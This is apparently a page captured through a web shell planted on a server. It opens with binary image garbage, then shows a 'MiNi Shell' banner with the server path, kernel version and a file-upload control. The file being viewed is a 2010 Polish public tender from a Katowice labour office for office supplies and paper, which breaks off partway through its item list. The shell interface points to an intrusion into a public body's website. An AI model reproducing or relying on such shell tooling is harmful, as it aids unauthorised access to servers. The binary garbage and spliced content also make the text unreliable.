JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100224/39333-N-2010.html

<p class="kh_header"><b>Katowice: Dostawa materiałów biurowych oraz papieru.</b><br>
<b>Numer ogłoszenia: 39333 - 2010; data zamieszczenia: 24.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych oraz papieru..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Część I - dostawa materiałów biurowych dla potrzeb WUP:
1.Bloczek samoprzylepny 38mm x51 mm 	1200 szt.	
2.Bloczek samoprzylepny 76 mm x76 mm 	600 szt.	
3.Bloczek samoprzylepny 76 mm x127 mm 	300 szt. 
4.Blok makulaturowy A5 	50 szt.	
5.Blok makulaturowy A4 	20 szt.	
6.Blok do flipchartu A1 	5 szt.	
7.Cienkopis o grubości linii 0,4 mm  	100 szt.	
8.Cienkopis do płyt CD  czarny o gr. linii 0,4 mm	30 szt.	
9.Długopis automatyczny z wymiennym wkładem 	250 szt.	
10.Wkład do długopisu szczegółowo opisanego w poz. 9	250 szt.	
11.Długopis żelowy z wymiennym wkładem 	200 szt.	
12.Wkład do długopisu z poz. 11	            200 szt.	
13.Długopis jednorazowy typu BIC 	150 szt.	
14.Długopis samoprzylepny na sprężynce z wymiennym wkładem	5 szt.	
15.Dziurkacz 	20 szt.	
16.Taśmy do drukarek etykiet o wym. 12mm x7m, 	5 szt.	
17.Etykiety adresowe o wym. 105x74 mm		10 opak.
18.Folia do faksu typu Panasonic  KX-FP343PD	5 szt.	
19.Folia do faksu typu Panasonic KX-FC243	2 szt.	
20.Grzbiety do bindowania  8 mm  		2 opak.
21.Grzbiety do bindowania 12 mm  		2 opak.
22.Gumka kombinowana	100 szt.	
23.Kalkulator   	10 szt.	
24.Klej w sztyfcie o wadze nie mniejszej niż 22g nietoksyczny	30 szt.	
25.Klej w tubce o wadze nie mniejszej niż 50 ml	     30	szt.
26.Klip do papieru 19 mm 	600 szt.
27.Klip do papieru 32 mm	600	szt.
28.Koperta C6 biała samoprzylepna  		20 opak. 
29.Koperta C5 biała samoprzylepna  		50 opak.
30.Korektor w płynie ekologiczny z gąbką	48 szt.	
31.Korektor w piórze z metalową końcówką o pojemności min. 9 ml	10 szt.	
32.Korektor w taśmie z kasetą wymienną  	50 szt.	
33.Wkład do korektora jak w poz. 31	50 szt.	
34.Kostka biurowa kolor 8,5x8,5 mm	50 szt.	
35.Koszulki A4 groszek wykonane z folii PP 		700 opak. 
36.Linijka plastikowa 20 cm	20 szt.	
37.Linijka plastikowa  30 cm	20 szt.	
38.Marker do tablic suchościeralnych z okrągłą końcówką -  	80 szt.	
39.Marker zwykły, wszystkie kolory z okrągłą końcówką	60 szt.	
40.Masa mocująca w opakowaniu po 35g		2 opak.
41.Naboje atramentowe typu Watterman ( długie )  		20 opak.
42.Naboje atramentowe typu Parker  		20 opak. 
43.Mechanizm skoroszytowy  		2 opak.
44.Nożyczki wykonane z nierdzewnej stali, gumowy uchwyt 20 cm	50szt.
45.Ofertówka   	1250 szt.	
46.Okładki do bindowania przeźroczyste przód  		5opak.
47.Okładki do bindowania tył karton twardy jednostronnie kolorowy  		5opak.
48.Ołówek z gumką HB 	360szt.	
49.Papier do faksu 210x30 mm  		3opak.
50.Pióro kulkowe czarne o grubości linii 0,2 mm	50szt.
51.Przekładki do segregatorów z kolorowego polipropylenu formatu A4,   		50opak.
52.Przybornik na biurko - walec dymny z przegródkami	50szt.	
53.Pudełko archiwizacyjne o szerokości grzbietu 100 mm,  	300szt.	
54.Pudło archiwizacyjne z tektury bezkwasowej  	150szt.	
55.Pinezki kolorowe  		10opak.
56.Segregator A4/70-75 kolor z mechanizmem dźwigniowym	100szt.	
57.Segregator A4/50 kolor z mechanizmem dźwigniowym	50szt.	
58.Spinacze okrągłe 28 mm  		100opak. 
59.Spinacze plikowe  		20opak.
60.Spinacze krzyżowe  		10opak. 
61.Szuflada na dokumenty na biurko - dymna - pozioma	48szt.	
62.Szuflada na dokumenty na biurko - pionowa PCV	10szt.	
63.Taśma klejąca  18mm x 10mm  		10opak.
64.Taśma klejąca  24mm x 20mm  		10opak.
65.Teczka do podpisu zawierająca co najmniej 15 kartek	50szt.	
66.Teczka wiązana kartonowa A4 biała	1000szt.	
67.Teczka z gumką kolorowa A4	500szt.	
68.Teczka skrzydłowa na rzep	48szt.	
69.Teczka zawieszkowa biała kartonowa	500szt.	
70.Teczka zawieszana kolorowa-niebieska z etykietą	100szt.	
71.Temperówka pojedyncza metalowa	50szt.	
72.Zakreślacz  ze ściętą końcówką 	120szt.	
73.Zszywacz o metalowej konstrukcji  	25szt.	
74.Zszywki do zszywaczy 24/6   		400opak.
75.Kalendarz biurkowy-terminarz leżący na rok 2011	10szt.	
76.Kalendarz biurkowy-terminarz stojący na rok 2011	230szt.	


2. Część II - dostawa papieru dla potrzeb WUP:

1.Papier kserograficzny A4 80g  		2000 ryz
2.Papier Laser Photo błyszczący, dwustronny A4  	2 op.
		

	

3. Część III - dostawa materiałów biurowych dla potrzeb projektu systemowego  PO KL pt. Program monitorowania regionalnego rynku pracy:
 
1.Długopis z systemem przyciskowym  	5szt.	
2.Klip do papieru 32 mm  		1opak..
3.Koszulki A4 przezroczyste  		4 opak.
4.Marker do płyt CD wodoodporny  	2szt.		
5.Papier kserograficzny A4 80 g  	 	10 ryz
6.Pinezki do tablicy korkowej  		1opak.
7.Pióro kulkowe czarne i niebieskie o grub. linii 0,5 mm	8szt.		
8.Segregator A4/50 kolor z mechanizmem dźwigniowym	5szt.		
9.Segregator A4/75 kolor z mechanizmem dźwigniowym	5szt.		
10.Zakładki indeksujące, do zaznaczania stron w dokumentach  		1opak.
11.Zakreślacze kolorowe ze ściętą końcówką 	8szt.		
12.Zszywki do zszywaczy 24/6 min 40 kartek  .		5opak.

4. Część IV - dostawa materiałów biurowych dla potrzeb projektu systemowego
                   PO KL pt. Promocja przedsiębiorczości w województwie śląskim:

1.Długopis żelowy z wymiennym wkładem  	3szt.	
2.Długopis	5szt.	
3.Dziurkacz z ogranicznikiem formatu 	1szt.	
4.Etykiety samoprzylepne o wym. 70x30  	 	1opak. 
5.Folia do bindowania 0,2 mm bezbarwna  		1opak.
6.Grzbiety do bindowania A4, rozmiar 10 mm 		1opak. 
7.Grzbiety do bindowania A4, rozmiar 12 mm 		1opak. 
8.Grzbiety do bindowania A4, rozmiar 25 mm  		1opak. 
9.Kalkulator  	2szt.	
10.Karton do bindowania  		1opak. 
11.Koperty C5, białe, samoprzylepne (bez paska), 80g/m2    	1opak. 
12.Koszulki A4 przezroczyste wykonane z folii PP  		3opak. 
13.Marker do płyt CD/DVD czarny	1szt.
14.Marker do tablic suchościeralnych, wymienny wkład 		1opak.
15.Nożyczki biurowe proste stal nierdzewna 21 cm	1szt.	
16.Ołówek zwykły z gumką HB 2 	5szt.	
17.Pinezki kołeczki kolorowe do tablic korkowych  		1opak.
18.Rozszywacz	3szt.	
19.Segregator A4/75 mm kolor z mechanizmem dźwigniowym 	5szt.	
20.Spinacze okrągłe 28 mm  		1opak. 
21.Spinacze plikowe 50 mm  		1opak.
22.Taśma klejąca 18mm*30m	2szt. 
23.Teczka do podpisu  	2szt.	
24.Temperówka metalowa	2szt.	
25.Tusz do stempli gumowych - czerwony	1szt.	
26.Zakreślacze ze ściętą końcówką  	 	1opak. 
27.Zszywacz nożycowy min. 40 kartek na zszywki 24/ 6, 24/ 8	1szt.	
28.Zszywki o wymiarach 23/6  		5opak. 

5. Część V - dostawa papieru dla potrzeb projektu systemowego PO KL pt. Promocja przedsiębiorczości w województwie śląskim:
Papier kserograficzny dostarczony przez Wykonawcę:
1)	kolor biały,
2)	pozwalający na wydruki z urządzeń typu:  
  - drukarki atramentowe,
  - drukarki laserowe,
  - faksy,
  - kserokopiarki.

1.Papier kserograficzny A4 (gramatura 80 g/m2) o białości nie mniejszej niż CIE 146 pakowany w ryzach po 500 arkuszy		20 ryz

6. Część VI - dostawa materiałów biurowych dla potrzeb projektu konkursowego PO KL pt. Kompetencje na miarę potrzeb:

1.Atrament do piór wiecznych, niebieski min. 57 ml		5szt.	
2.Automatyczny numerator 		1szt.	
3.Bloczek samoprzylepny 38mmx51mm  		10opak.
4.Bloczek samoprzylepny 76mmx76mm  		20opak.
5.Bloczek samoprzylepny 76mmx76mm  		2opak.
6.Bloczek samoprzylepny 76mmx76mm  		1opak.
7.Kostka biurowa biała, wymiary 75mm x 75 mm	20szt.	
8.Blok papierowy do flipchartów gładki 40 kartek  	5szt.	
9.Bloki biurowe w kratkę, 100 kartek, Format A4	10szt.	
10.Cienkopis automatyczny z wymiennym wkładem czarnym;  	5szt.	
11.Cienkopis automatyczny z wymiennym wkładem czerwony;  	5szt.	
12.Cienkopis automatyczny z wymiennym wkładem niebieskim;  	20szt.	
13.Datownik automatyczny wysokość cyfr/liter 4 mm	1szt.	
14.Długopis żelowy z wymiennym wkładem czarnym;    	5szt.	
15.Długopis żelowy z wymiennym wkładem czerwonym;    	5szt.	
16.Długopis żelowy z wymiennym wkładem niebieskim; gumowy uchwyt;  	20szt.	
17.Długopis, czarny, obrotowy mechanizm wysuwania wkładu   	5szt.	
18.Dziurkacz z ogranicznikiem formatu 	5szt.	
19.Etykiety samoprzylepne o wym. 70x30  		2opak.
20.FlipChart, pozwalający na pisanie pisakami, tablica łatwościeralna  	1szt.	
21.Okładka do bindowania przeźroczysta przód  		4opak.
22.Grafity do ołówków automatycznych, grubość wkładu 0,5 mm, HB		20opak.
23.Grzbiety do bindowania A4, rozmiar 10 mm 		2opak.
24.Grzbiety do bindowania A4, rozmiar 12 mm 		2opak.
25.Grzbiety do bindowania A4, rozmiar 25 mm 		2opak.
26.Grzbiety do bindowania A4, rozmiar 8 mm 		2opak.
27.Gumka mała (miękka) do stosowania na papierze	10szt.	
28.Kalendarz książkowy na rok 2011 A4 tygodniowy 	5szt.	
29.Kalkulator  	5szt.	
30.Kartki - wkład 5 kolorowy, wymiary 85 mm x 85 mm 		20opak. 
31.Karton do bindowania Chromolux 250g A4 - czarny  		2opak.
32.Karton do bindowania Chromolux 250g A4 - niebieski   		2opak. 
33.Karty wizytowe do wizytownika, dwustronne]		10opak.
34.Kieszeń samoprzylepna na płyty CD 		5opak. 
35.Klej w sztyfcie pojemność 8g	2szt.
36.Klipy biurowe, 25 mm 		5 opak. 
37.Klipy biurowe, 32 mm 		5 opak. 
38.Klipy biurowe, 41 mm 		5 opak. 
39.Kolorowe magnesy do tablic magnetycznych, średnica 28 mm 		2opak. 
40.Kołonotatnik, A4, 90 kartek, 80g/m2, kratka	20szt.	
41.Kołonotatnik, A5 80 kartek, 80g/m2, kratka	20szt.	
42.Koperty C5, białe, samoprzylepne (bez paska), 80g/m2   10opak. 
43.Korektor w długopisie; szybkoschnący	2szt.	
44.Kostka biurowa kolor 8,5x8,5 mm	20szt.	
45.Kosz na papier 12 l  	5szt.	 
46.Koszulki A4 na wizytówki; przezroczyste, 20 wizytówek 	10szt.	
47.Koszulki A4 przezroczyste wykonane z folii PP 		70opak. 
48.Linijka 30 cm, polistyren	10szt.	
49.Marker do płyt CD/DVD czarny	5szt.	
50.Marker do tablic sucho ścieralnych, wymienny wkład		4opak. 
51.Notes (kartki) w pojemniku plastikowym 	5szt.	
52.Nożyczki biurowe proste stal nierdzewna 21 cm	5szt.	
53.Ofertówka A4  	100szt.	
54.Ołówek automatyczny z wkładem 0.5 mm  	10szt.	
55.Ołówek zwykły z gumką HB 2 	20szt.	
56.Pinezki kołeczki kolorowe do tablic korkowych  		1opak. 
57.Pióro wieczne, czarne 	5szt.
58.Planer tygodniowy   	1szt.	
59.Poduszka do stempli czarny (160X90mm)	4szt.	
60.Przekładka kartonowa 1/3 A4 		5opak.
61.Przybornik na karteczki  	5szt.	
62.Przybornik na wizytówki  	5szt.	
63.Przybornik stojący duży  	5szt.	
64.Przybornik stojący mały  	5szt.	
65.Przybornik stojący na dokumenty  	5szt.	
66.Przybornik z przegr., kart. i miejscem na taśmę  	5szt.	
67.Przybornik z przegrodami na biurko  	5szt.	
68.Pudło archiwizacyjne zbiorcze kartonowe A4;  	40szt.	
69.Pudło do archiwizacji dokumentów kartonowe A4 	200szt.	
70.Rozszywacz	6szt.	
71.Różnokolorowe breloczki do kluczy, z wymienną etykietą	20szt.	 
72.Segregator A4/75 mm kolor z mechanizmem dźwigniowym	200szt.	
73.Spinacze krzyżowe  		5opak. 
74.Spinacze okrągłe 28 mm  		5opak. 
75.Spinacze plikowe 50 mm  		5 opak. 
76.Stojak do kopert - metalowy 	5szt.	
77.Stojak na 16 płyt CD/DVD  	5szt.	
78.Stojak na książki  	5szt.	
79.Sznurek do archiwizacji - dratwa - waga 10 dag	5szt.	
80.Tablica suchościerna, wym. 1200 mm x 900 mm 	1szt.	
81.Taśma klejąca 18mm*30m	3szt.
82.Teczka do podpisu  	4szt.	
83.Teczka harmonijkowa 	20szt.	
84.Teczka na rzep A4	10	szt.
85.Teczka z gumką A4  	30	szt.
86.Temperówka metalowa	5szt.	
87.Tusz do stempli gumowych - czarny	2szt.	
88.Tusz do stempli gumowych - czerwony	3szt.	
89.Wizytownik obrotowy, pojemność 400 sztuk 	5szt.	
90.Wkłady do długopisów  	10szt.	
91.Wkłady do długopisów  	10szt.	
92.Zakładki indeksujące w bloczkach pakowane po 4 kolory x 50 kartek	10opak. 
93.Zakreślacz  		5opak. 
94.Zakreślacz z 50 zakładkami 	30szt.	
95.Zakreślacze ze ściętą końcówką  		10opak. 
96.Zestaw 3 szuflad  	5szt.	
97.Zestaw 3 szuflad na ścianę  	5szt.	
98.Zszywacz nożycowy  	10szt.	
99.Zszywacz zszywający min 100 kartek  	1szt.	
100.Zszywki o wymiarach 23/10  		5 opak. 
101.Zszywki o wymiarach 23/13  		5opak. 
102.Zszywki o wymiarach 23/6  		5opak. 

7. Część VII - dostawa papieru dla potrzeb projektu konkursowego PO KL 
 pt. Kompetencje na miarę potrzeb:
Papier kserograficzny dostarczany przez Wykonawcę:
1) kolor biały, kolor morski, kolor     zielony, kolor żółty
2) pozwalający na wydruk z urządzeń typu:
- drukarki atramentowej
- drukarki laserowej
- faksy
- kserokopiarki

Lp.	Asortyment	                                                               Ilość
		                                                                      Szt.	Op./ ryzy
1.Papier kolorowy, morski, ryza po 500 szt. Format A4, 80 g/m4		2 ryzy 
2.Papier kolorowy, zielony, ryza po 500 szt. 80 g/m3		2 ryzy
3.Papier kolorowy, zółty, ryza po 500 szt. 		2 ryzy
4.Papier kserograficzny Format A4 (gramatura 80 g/m2)		100 ryz
5.Papier kserograficzny, profesjonalny kolorowy wydruk o fotograficznej jakości  10 ryz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
pok. 304 - 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2010 godzina 10:10, miejsce: Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
pok. 352 Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych oraz papieru..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - dostawa materiałów biurowych dla potrzeb WUP:
1.Bloczek samoprzylepny 38mm x51 mm - 1200 szt.	
2.Bloczek samoprzylepny 76 mm x76 mm - 600 szt.	
3.Bloczek samoprzylepny 76 mm x127 mm - 300 szt. 
4.Blok makulaturowy A5 - 50 szt.	
5.Blok makulaturowy A4 - 20 szt.	
6.Blok do flipchartu A1 - 5 szt.	
7.Cienkopis o grubości linii 0,4 mm  	- 100 szt.	
8.Cienkopis do płyt CD  czarny o gr. linii 0,4 mm -	30 szt.	
9.Długopis automatyczny z wymiennym wkładem 	- 250 szt.	
10.Wkład do długopisu szczegółowo opisanego w poz. 9- 	250 szt.	
11.Długopis żelowy z wymiennym wkładem 	- 200 szt.	
12.Wkład do długopisu z poz. 11-            200 szt.	
13.Długopis jednorazowy typu BIC -	150 szt.	
14.Długopis samoprzylepny na sprężynce z wymiennym wkładem-	5 szt.	
15.Dziurkacz 	-  20 szt.	
16.Taśmy do drukarek etykiet o wym. 12mm x7m, - 5 szt.	
17.Etykiety adresowe o wym. 105x74 mm	- 10 opak.
18.Folia do faksu typu Panasonic  KX-FP343PD	- 5 szt.	
19.Folia do faksu typu Panasonic KX-FC243- 	2 szt.	
20.Grzbiety do bindowania  8 mm  	- 2 opak.
21.Grzbiety do bindowania 12 mm  -	2 opak.
22.Gumka kombinowana- 	100 szt.	
23.Kalkulator   	- 10 szt.	
24.Klej w sztyfcie o wadze nie mniejszej niż 22g nietoksyczny - 30 szt.	
25.Klej w tubce o wadze nie mniejszej niż 50 ml	   -  30szt.
26.Klip do papieru 19 mm -	600 szt.
27.Klip do papieru 32 mm	- 600szt.
28.Koperta C6 biała samoprzylepna  -	20 opak. 
29.Koperta C5 biała samoprzylepna  -	50 opak.
30.Korektor w płynie ekologiczny z gąbką- 	48 szt.	
31.Korektor w piórze z metalową końcówką o pojemności min. 9 ml -	10 szt.	
32.Korektor w taśmie z kasetą wymienną  - 50 szt.	
33.Wkład do korektora jak w poz. 31 -	50 szt.	
